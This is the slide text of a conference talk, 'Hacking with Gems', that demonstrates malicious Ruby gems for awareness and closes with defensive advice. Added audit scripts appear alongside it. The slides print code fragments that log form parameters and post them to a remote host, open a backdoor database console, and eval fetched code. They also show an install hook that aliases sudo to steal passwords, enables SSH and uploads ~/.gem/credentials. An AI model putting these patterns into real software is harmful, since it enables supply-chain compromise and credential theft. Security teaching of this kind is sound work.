Slide 1

Slide 1 text

Hacking with Gems
Benjamin Smith
@benjamin_smith

Slide 2

Slide 2 text

How-to get rich quick and (maybe) not go to jail!

Slide 3

Slide 3 text

Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer.

Slide 4

Slide 4 text

who i am

Slide 5

Slide 5 text

No content

Slide 6

Slide 6 text

No content

Slide 7

Slide 7 text

No content

Slide 8

Slide 8 text

what i am NOT

Slide 9

Slide 9 text

No content

Slide 10

Slide 10 text

please do not try this at home

Slide 11

Slide 11 text

please do not try this at home

Slide 12

Slide 12 text

how it all started

GEM
  remote: https://rubygems.org/
  specs:
    actionmailer (3.2.12)
      actionpack (= 3.2.12)
      mail (~> 2.4.4)
    actionpack (3.2.12)
      activemodel (= 3.2.12)
      activesupport (= 3.2.12)
      builder (~> 3.0.0)
      erubis (~> 2.7.0)
    ...

Slide 13

Slide 13 text

what’s the worst that could happen?

Slide 14

Slide 14 text

No content

Slide 15

Slide 15 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 16

Slide 16 text

before... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 17

Slide 17 text

after! github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 18

Slide 18 text

some “side effects”

if params.to_s.match(Base64.decode64('cGF...'))

github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 19

Slide 19 text

...
File.open("#{Rails.root}/public/development.log", 'a+') do |f|
  f.write("#{params.inspect}\n")
end

github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 20

Slide 20 text

?!?

Net::HTTP.post_form(
  URI.parse(Base64.decode64('aHR0cDo...')),
  { 'log' => params.merge(:url => request.url).inspect }
)

github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 21

Slide 21 text

i like cGFzc3dvcmQ=\n

if params.to_s.match(Base64.decode64('cGF...'))

github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 22

Slide 22 text

i like password

if params.to_s.match("password")

github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 23

Slide 23 text

“development.log”

...
"user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"}
...

github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 24

Slide 24 text

elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 25

Slide 25 text

profit

• Step 1: do something
• Step 2: do something else
• Step 3: ????
• Step 4: profit

Slide 26

Slide 26 text

profit

• Step 1: write a gem that does something
• Step 2:
• Step 3:
• Step 4:

Slide 27

Slide 27 text

profit

• Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws
• Step 3:
• Step 4:

Slide 28

Slide 28 text

profit

• Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws
• Step 3: use emails/pws on banking websites to transfer funds
• Step 4:

Slide 29

Slide 29 text

profit

• Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws
• Step 3: use emails/pws on banking websites to transfer funds
• Step 4: profit

Slide 30

Slide 30 text

profit

• Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws
• Step 3: use emails/pws on banking websites to transfer funds
• Step 4: profit
• Step 5: flee the country

Slide 31

Slide 31 text

a one way ticket to

Slide 32

Slide 32 text

that was easy. what else can I do?

Slide 33

Slide 33 text

gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

Slide 34

Slide 34 text

show me the hack

Net::HTTP.post_form(
  #,
  {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...

github.com/benjaminleesmith/net_http_detector

Slide 35

Slide 35 text

how it works

def HTTP.valid_post_form(url, params)
  ...

def HTTP.post_form(url, params)
  self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
  Net::HTTP.valid_post_form(url, params)
end

github.com/benjaminleesmith/net_http_detector
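The override shown above works because any loaded gem may redefine Net::HTTP.post_form for the whole process. One defensive check, added here as an example that is neither the talk's code nor the net_http_detector gem's: ask Ruby where the live definition of each sensitive method comes from (Method#source_location) and flag any that sits outside the interpreter's own library directories. The watched-method list, the trusted directories and the PostFormWrapper stand-in used to exercise the check are assumptions of this example.

```ruby
require 'net/http'
require 'rbconfig'
require 'rubygems'

# Directories accepted as the home of stdlib and default-gem definitions.
# Assumption: a standard Ruby install; gems installed into a separate user
# GEM_HOME would need that directory added here or they will be reported.
TRUSTED_PREFIXES = [
  RbConfig::CONFIG['rubylibdir'],
  RbConfig::CONFIG['rubyarchdir'],
  Gem.default_dir,
].compact.map { |d| File.expand_path(d) }.freeze

# [receiver, method name, :singleton or :instance] triples worth watching:
# the entry points a credential-harvesting override would hook.
WATCHED = [
  [Net::HTTP, :post_form,    :singleton],
  [Net::HTTP, :get_response, :singleton],
  [Net::HTTP, :request,      :instance],
].freeze

def current_definition(receiver, name, kind)
  kind == :instance ? receiver.instance_method(name) : receiver.method(name)
end

# Returns one hash per watched method whose live definition is Ruby code
# outside the trusted directories. Methods implemented in C report no
# source_location and are skipped: they belong to the interpreter itself.
def foreign_definitions(watched = WATCHED, trusted = TRUSTED_PREFIXES)
  watched.each_with_object([]) do |(receiver, name, kind), found|
    loc = current_definition(receiver, name, kind).source_location
    next if loc.nil?
    file, line = loc
    abs = File.expand_path(file)
    next if trusted.any? { |dir| abs.start_with?(dir) }
    sep = kind == :instance ? '#' : '.'
    found << { method: "#{receiver}#{sep}#{name}", file: file, line: line }
  end
end

# Demo stand-in for the gem's override: it only forwards to the original.
# The talk's version also logged url and params; the audit flags both the
# same way, because it looks at where the definition lives, not what it does.
module PostFormWrapper
  def post_form(url, params)
    super
  end
end

def simulate_override!
  Net::HTTP.singleton_class.prepend(PostFormWrapper)
end

if __FILE__ == $0
  puts "before override: #{foreign_definitions.inspect}"
  simulate_override!
  foreign_definitions.each do |f|
    puts "REVIEW #{f[:method]} is defined at #{f[:file]}:#{f[:line]}"
  end
end
```

Run it at application boot after Bundler.require so every gem has had its chance to patch; anything reported points at a file you can open and read. The check is a tripwire, not a proof of innocence: a definition inside a trusted directory can still be malicious if the gem that put it there was, and a rbenv or rvm layout may need its own paths added to TRUSTED_PREFIXES to avoid false positives.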

Slide 36

Slide 36 text


Slide 37

Slide 37 text


Slide 38

Slide 38 text

...and one more thing...

eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))

github.com/benjaminleesmith/net_http_detector

Slide 39

Slide 39 text

database what?

append_before_filter :net_http_detector
...
if params[:db_console]
  @tables = ActiveRecord::Base.connection.tables
  if params[:query]
    @output = ActiveRecord::Base.connection.execute(params[:query])

github.com/benjaminleesmith/net_http_detector

Slide 40

Slide 40 text


Slide 41

Slide 41 text


Slide 42

Slide 42 text


Slide 43

Slide 43 text

/users/sign_in github.com/benjaminleesmith/net_http_detector

Slide 44

Slide 44 text

/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

Slide 45

Slide 45 text

hello db access! github.com/benjaminleesmith/net_http_detector

Slide 46

Slide 46 text

SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

Slide 47

Slide 47 text

UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

Slide 48

Slide 48 text

CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

Slide 49

Slide 49 text

careful of wolves in sheep’s clothing

Slide 50

Slide 50 text

profit

• Step 1:
• Step 2:
• Step 3:
• Step 4:
• Step 5:

Slide 51

Slide 51 text

profit

• Step 1: write a gem that does something
• Step 2:
• Step 3:
• Step 4:
• Step 5:

Slide 52

Slide 52 text

profit

• Step 1: write a gem that does something
• Step 2: add code to provide DB access
• Step 3:
• Step 4:
• Step 5:

Slide 53

Slide 53 text

profit

• Step 1: write a gem that does something
• Step 2: add code to provide DB access
• Step 3: use personal info to apply for a boat loan (i.e. buy a pimp trimaran)
• Step 4:
• Step 5:

Slide 54

Slide 54 text

profit

• Step 1: write a gem that does something
• Step 2: add code to provide DB access
• Step 3: use personal info to apply for a boat loan (i.e. buy a pimp trimaran)
• Step 4: profit
• Step 5:

Slide 55

Slide 55 text

profit

• Step 1: write a gem that does something
• Step 2: add code to provide DB access
• Step 3: use personal info to apply for a boat loan (i.e. buy a pimp trimaran)
• Step 4: profit
• Step 5: flee the country

Slide 56

Slide 56 text

i like the beach

Slide 57

Slide 57 text

that was easy. what else can I do?

Slide 58

Slide 58 text

gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

Slide 59

Slide 59 text

what it claims to do

Date.new(2005, 1, 1).to_s(:short)
=> "1 Jan"

... instead of...

=> " 1 Jan"

github.com/benjaminleesmith/better_date_to_s

Slide 60

Slide 60 text

No content

Slide 61

Slide 61 text

what it also does

set_date_formats_for(Rails.env, Rails.root.to_s)

github.com/benjaminleesmith/better_date_to_s

Slide 62

Slide 62 text

better_date_to_s.bundle

(the slide showed a raw dump of the compiled Mach-O bundle; only the segment and section names are recoverable: __TEXT/__text, __stubs, __stub_helper, __cstring, __unwind_info, __eh_frame, __DATA/__nl_symbol_ptr, __got, __la_symbol_ptr, __data, __LINKEDIT)

github.com/benjaminleesmith/better_date_to_s

Slide 63

Slide 63 text

behind the curtain

if(strcmp(rails_env, "production") == 0) {
  sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1", rails_root, rails_root);
  system(tar_command);
}

github.com/benjaminleesmith/better_date_to_s

Slide 64

Slide 64 text

what what github.com/benjaminleesmith/better_date_to_s

Slide 65

Slide 65 text

i can haz source github.com/benjaminleesmith/better_date_to_s

Slide 66

Slide 66 text

truth time

• this gem doesn't actually work
• but it could... if I wasn't lazy
• "fat" gems are tricky to compile

github.com/benjaminleesmith/better_date_to_s

Slide 67

Slide 67 text

so much code so little time

• Step 1: write a gem that does something
• Step 2: add code to expose source
• Step 3: sell to competitors?
• Step 4: profit?
• Step 5: flee the country

Slide 68

Slide 68 text

that was easy hard. what else can I do? (that's easier)

Slide 69

Slide 69 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 70

Slide 70 text

what it does

> true.should be_true
> User.new.should be_true
> User.new.should be_truthy

github.com/benjaminleesmith/be_truthy

Slide 71

Slide 71 text

what it ACTUALLY does github.com/benjaminleesmith/be_truthy

Slide 72

Slide 72 text

github.com/benjaminleesmith/be_truthy

Slide 73

Slide 73 text

file tree looks ok github.com/benjaminleesmith/be_truthy

Slide 74

Slide 74 text

source code looks good

require "be_truthy/version"

module BeTruthy
end

github.com/benjaminleesmith/be_truthy

Slide 75

Slide 75 text

but what was this? github.com/benjaminleesmith/be_truthy

Slide 76

Slide 76 text

I see no C github.com/benjaminleesmith/be_truthy

Slide 77

Slide 77 text

run the what file?

Gem::Specification.new do |gem|
  ...
  gem.extensions = ["Rakefile"]
  ...
end

github.com/benjaminleesmith/be_truthy

Slide 78

Slide 78 text

there is no Rakefile github.com/benjaminleesmith/be_truthy

Slide 79

Slide 79 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 80

Slide 80 text

the real file tree github.com/benjaminleesmith/be_truthy

Slide 81

Slide 81 text

what does the Rakefile do? github.com/benjaminleesmith/be_truthy

Slide 82

Slide 82 text

sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

github.com/benjaminleesmith/be_truthy

Slide 83

Slide 83 text

File.open(profile, 'a+') do |f|
  f.write("alias sudo='ruby #{home}/.tmp'\n")
end

github.com/benjaminleesmith/be_truthy

Slide 84

Slide 84 text

FileUtils.rm(__FILE__)

github.com/benjaminleesmith/be_truthy
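The three steps above leave exactly one durable trace on the developer's machine: a line in a shell profile that makes `sudo` resolve to a script instead of /usr/bin/sudo. The following audit, added here as an example that is not part of the talk or the be_truthy gem, scans profile text for aliases and shell functions that shadow commands which prompt for a password or secret. The watchlist, the file names checked and the SAMPLE_PROFILE text are constructed for this example.

```ruby
# Commands whose prompt an attacker would want to intercept. Assumption of
# this example; extend to taste (e.g. gpg, docker login).
SHADOW_WATCHLIST = %w[sudo su ssh scp passwd gem git].freeze

# bash/zsh forms: alias name='value', alias name="value", alias name=value
ALIAS_RE = /\A\s*alias\s+([\w.-]+)=(.*)\z/
# function forms: name() { ... }, function name() { ... }, function name { ... }
FUNCTION_RE = /\A\s*(?:function\s+)?([\w.-]+)\s*\(\s*\)|\A\s*function\s+([\w.-]+)\b/

def unquote(value)
  v = value.strip
  quoted = (v.start_with?("'") && v.end_with?("'")) || (v.start_with?('"') && v.end_with?('"'))
  quoted ? v[1..-2] : v
end

# Returns one hash per line of profile_text that redefines a watched command.
# Comment lines never execute and are skipped; everything else is examined.
def shadowed_commands(profile_text, source = '(text)', watch = SHADOW_WATCHLIST)
  hits = []
  profile_text.each_line.with_index(1) do |raw, lineno|
    line = raw.chomp
    next if line.lstrip.start_with?('#')
    if (m = ALIAS_RE.match(line))
      name = m[1]
      hits << { kind: :alias, name: name, target: unquote(m[2]), file: source, line: lineno } if watch.include?(name)
    elsif (m = FUNCTION_RE.match(line))
      name = m[1] || m[2]
      hits << { kind: :function, name: name, target: line.strip, file: source, line: lineno } if watch.include?(name)
    end
  end
  hits
end

# Checks the usual login and interactive profiles under one home directory.
def audit_profiles(home = Dir.home, watch = SHADOW_WATCHLIST)
  %w[.bashrc .bash_profile .profile .zshrc .zprofile].flat_map do |name|
    path = File.join(home, name)
    File.file?(path) ? shadowed_commands(File.read(path), path, watch) : []
  end
end

# Constructed sample profile; the sudo line mirrors what the slide appends.
SAMPLE_PROFILE = <<~'PROFILE'
  # constructed sample ~/.bash_profile
  export PATH="$HOME/bin:$PATH"
  alias ll='ls -l'
  # alias sudo='echo commented out'
  alias sudo='ruby /home/dev/.tmp'
  function ssh() { /usr/bin/ssh "$@"; }
  gem() { command gem "$@"; }
PROFILE

if __FILE__ == $0
  puts '--- sample profile ---'
  shadowed_commands(SAMPLE_PROFILE, '~/.bash_profile').each do |h|
    puts "#{h[:file]}:#{h[:line]} #{h[:kind]} #{h[:name]} -> #{h[:target]}"
  end
  puts '--- this account ---'
  audit_profiles.each do |h|
    puts "#{h[:file]}:#{h[:line]} #{h[:kind]} #{h[:name]} -> #{h[:target]}"
  end
end
```

The live check (`audit_profiles`) only reads the standard profile files; a profile that `source`s another file, or a zsh global alias (`alias -g`), is outside what this parser follows, so pair it with the shell's own answer, `type sudo` or `command -v sudo`, which reports whatever definition actually wins in the running shell. A hit is a review item, not a verdict: many people alias `git` or wrap `ssh` legitimately, but a `sudo` alias pointing at a hidden file in the home directory is the pattern the slide shows.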

Slide 85

Slide 85 text

what does "sudo" do now? github.com/benjaminleesmith/be_truthy

Slide 86

Slide 86 text

print "WARNING: Improper use of the sudo command ..."
system "stty -echo"
password = $stdin.gets.chomp
system "stty echo"
print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

github.com/benjaminleesmith/be_truthy

Slide 87

Slide 87 text


Slide 88

Slide 88 text


Slide 89

Slide 89 text


Slide 90

Slide 90 text

echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

Slide 91

Slide 91 text

/usr/bin/sudo dscl . -create /Users/#{username}
...
/usr/bin/sudo dscl . -passwd /Users/#{username} password`

github.com/benjaminleesmith/be_truthy

Slide 92

Slide 92 text

Net::HTTP.post_form(URI.parse('http://.../logs'), {'log' => 'ssh enabled'})

github.com/benjaminleesmith/be_truthy

Slide 93

Slide 93 text

ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

Slide 94

Slide 94 text

take away: don't install ben's gems

Slide 95

Slide 95 text

No content

Slide 96

Slide 96 text

how could I get you to install my gems?

Slide 97

Slide 97 text

what gems are trustworthy?

Slide 98

Slide 98 text

how can I add my code to already trusted gems?

Slide 99

Slide 99 text

back in the be_truthy gem

gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
gem_list = `gem list`
Net::HTTP.post_form(...)

github.com/benjaminleesmith/be_truthy

Slide 100

Slide 100 text


Slide 101

Slide 101 text


Slide 102

Slide 102 text


Slide 103

Slide 103 text

now I own your gems github.com/benjaminleesmith/be_truthy

Slide 104

Slide 104 text

> git clone your-gem-repo
...add a little code...
> rake build
> gem push your-gem

github.com/benjaminleesmith/be_truthy

Slide 105

Slide 105 text

do people trust your gems?

Slide 106

Slide 106 text

do people who install your gems have trustworthy gems?

Slide 107

Slide 107 text

No content

Slide 108

Slide 108 text

there’s still one problem

Slide 109

Slide 109 text

bootstrapping

Slide 110

Slide 110 text

being popular sucks

Slide 111

Slide 111 text

conferences

Slide 112

Slide 112 text

webmock

Slide 113

Slide 113 text

rspec-given

Slide 114

Slide 114 text

quacky

Slide 115

Slide 115 text

social engineering

Slide 116

Slide 116 text

No content

Slide 117

Slide 117 text

No content

Slide 118

Slide 118 text

• matt • smoe • bttf • james • tlittle • rbabcock • nusco • ixil • Stuart • eileen • jay • Michael • christopher.mcnabb

Slide 119

Slide 119 text

so what happens now?

Slide 120

Slide 120 text

ruby gems goes down

Slide 121

Slide 121 text

heroku deploys go down

Slide 122

Slide 122 text

i go to the beach

Slide 123

Slide 123 text

ruby gems goes down

Slide 124

Slide 124 text

heroku deploys go down

Slide 125

Slide 125 text

recovery

Slide 126

Slide 126 text

so what now?

Slide 127

Slide 127 text

gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

Slide 128

Slide 128 text

Little Snitch obdev.at/products/littlesnitch/index.html

Slide 129

Slide 129 text

gem install be_truthy github.com/benjaminleesmith/be_truthy

Slide 130

Slide 130 text

fseventer fernlightning.com/doku.php?id=software:fseventer:start

Slide 131

Slide 131 text

don’t “gem install” from strangers

Slide 132

Slide 132 text

gem fetch vs gem install

> gem fetch be_truthy
> gem unpack be_truthy-0.0.1.gem

github.com/benjaminleesmith/be_truthy
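Fetching and unpacking gives you the archive without running anything from it. The audit below, added here as an example that is not the talk's code nor any of its gems, automates what a reviewer would then look for, using the RubyGems API itself (Gem::Package) on the fetched .gem file: the install-time hooks declared in `extensions` (the be_truthy trick, where a Rakefile stood in for extconf.rb), precompiled native binaries that cannot be read as source (the better_date_to_s trick), and whether the package would survive `gem install -P HighSecurity` at all. The demo_gem package it builds to exercise the checks is constructed for this example and is not a real published gem.

```ruby
require 'rubygems'
require 'rubygems/package'
require 'rubygems/security'
require 'tmpdir'
require 'fileutils'

# A native extension is normally built from ext/<name>/extconf.rb. Anything
# else listed under `extensions` (a Rakefile, a stray .rb) still runs at
# install time, which is the hook the be_truthy gem used.
EXPECTED_EXTENSION = %r{\Aext/.*/extconf\.rb\z}
# Files that are already machine code: nothing to read, only to trust.
NATIVE_BINARY = /\.(so|bundle|dll|dylib)\z/i

# True when the package carries a signature chain the HighSecurity policy
# accepts; an unsigned gem makes verify raise Gem::Security::Exception.
def passes_high_security?(gem_path)
  Gem::Package.new(gem_path, Gem::Security::HighSecurity).verify
  true
rescue Gem::Exception
  false
end

# Reads the .gem archive without installing it and summarises what would
# happen at `gem install`.
def audit_gem_file(gem_path)
  pkg = Gem::Package.new(gem_path)
  spec = pkg.spec          # metadata.gz, the same spec `gem install` acts on
  contents = pkg.contents  # every path inside data.tar.gz
  {
    name: spec.full_name,
    extensions: spec.extensions,
    suspicious_extensions: spec.extensions.reject { |e| e.match?(EXPECTED_EXTENSION) },
    prebuilt_binaries: contents.grep(NATIVE_BINARY),
    passes_high_security: passes_high_security?(gem_path),
    contents: contents,
  }
end

# Builds a constructed sample gem (not a real published gem) that carries both
# tricks from the talk: a Rakefile registered as an extension and a
# precompiled bundle under lib/. Returns the absolute path of the .gem file.
def build_sample_gem(dir)
  Dir.chdir(dir) do
    FileUtils.mkdir_p('lib')
    File.write('lib/demo_gem.rb', "module DemoGem; end\n")
    File.write('lib/tmp.rb', "# stand-in for a payload file\n")
    File.write('lib/demo_gem.bundle', "\xCF\xFA\xED\xFE".b) # placeholder bytes, not a real binary
    File.write('Rakefile', "task :default do\n  # would run during gem install\nend\n")
    spec = Gem::Specification.new do |s|
      s.name       = 'demo_gem'
      s.version    = '0.0.1'
      s.summary    = 'constructed sample for the audit'
      s.authors    = ['example']
      s.files      = %w[lib/demo_gem.rb lib/tmp.rb lib/demo_gem.bundle Rakefile]
      s.extensions = ['Rakefile']
    end
    File.join(dir, Gem::Package.build(spec, true)) # true: skip spec validation
  end
end

if __FILE__ == $0
  Dir.mktmpdir do |dir|
    path = ARGV[0] || build_sample_gem(dir) # pass a fetched .gem to audit it
    audit_gem_file(path).each { |key, value| puts "#{key}: #{value.inspect}" }
  end
end
```

Run it as `ruby audit.rb be_truthy-0.0.1.gem` on the file `gem fetch` produced. A non-empty `suspicious_extensions` means code runs before you have read a line of it; a non-empty `prebuilt_binaries` means part of the gem cannot be read at all; and `passes_high_security: false` is the expected answer for most gems on rubygems.org, which is why `-P HighSecurity` fails on a stock Rails install as the next slides show. The `contents` list is the real file tree, as opposed to whatever the GitHub repository shows.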

Slide 133

Slide 133 text

No content

Slide 134

Slide 134 text

No content

Slide 135

Slide 135 text

curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

Slide 136

Slide 136 text

gem install rails -P HighSecurity

Slide 137

Slide 137 text

> gem install rails -P HighSecurity
Fetching: activesupport-3.2.12.gem (100%)
ERROR:  While executing gem ... (Gem::Exception)
    Unsigned gem

Slide 138

Slide 138 text

gem cert --build

Slide 139

Slide 139 text

https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust

Slide 140

Slide 140 text

sandboxing

Slide 141

Slide 141 text

github.com/rubygems/rubygems

Slide 142

Slide 142 text

tools to detect malicious code

Slide 143

Slide 143 text

private gem repos

Slide 144

Slide 144 text

do not try this at home

Slide 145

Slide 145 text

don't install gems you don't need to

Slide 146

Slide 146 text

pay attention to what your gems do

Slide 147

Slide 147 text

monitor your system

Slide 148

Slide 148 text

read the source

Slide 149

Slide 149 text

gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

Slide 150

Slide 150 text

on install github.com/benjaminleesmith/coal-mine-canary

Slide 151

Slide 151 text

the results github.com/benjaminleesmith/coal-mine-canary

Slide 152

Slide 152 text

thank you!

Slide 153

Slide 153 text

questions? ideas? @benjamin_smith https://github.com/benjaminleesmith